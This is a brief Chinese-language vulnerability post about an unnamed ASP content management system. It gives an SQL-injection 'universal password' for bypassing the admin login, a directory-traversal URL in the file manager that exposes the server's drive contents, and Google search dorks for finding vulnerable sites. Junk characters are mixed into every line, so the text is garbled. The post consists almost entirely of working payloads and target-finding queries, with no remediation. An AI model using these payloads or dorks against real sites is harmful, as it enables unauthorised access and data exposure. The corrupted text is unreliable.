后台万能密码 'or'='or'8 K! N2 B$ }* C/ N
- Q) h" \7 O5 t8 C后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!
, v3 U" l% Y z1 }7 ?admin/uploadfile.asp?currentFolder=/upfiles/../) t1 c$ F7 K5 u/ W/ B& W# z/ e" @
" `, a4 K/ G6 O! I漏洞证明:: [$ g4 q, X% y
8 y$ f' I8 o' ~1 I% }% e6 o
谷歌:inurl:type.asp?id=1 新闻中心
* b2 c/ L# f/ C或者 :inurl:download_ok.asp?! e* O3 T+ f. ^# c z
, s* S; T- C( d* |$ X) v |